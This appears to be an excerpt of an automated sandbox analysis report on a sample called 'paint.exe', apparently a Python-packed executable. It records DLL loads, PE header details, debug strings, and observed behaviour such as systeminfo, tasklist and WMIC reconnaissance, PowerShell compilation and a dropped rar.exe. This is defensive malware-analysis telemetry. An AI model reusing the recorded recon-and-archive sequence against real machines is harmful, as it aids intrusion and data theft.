Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: paint.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: paint.exe

Static file information: File size 8809834 > 1048576

Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: paint.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: paint.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: paint.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: paint.exe, 00000001.00000002.2019605876.00007FFE13201000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdbhP source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: paint.exe, 00000001.00000002.2019344015.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: paint.exe, paint.exe, 00000001.00000002.2017200622.00007FFE10231000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: paint.exe, 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdb source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
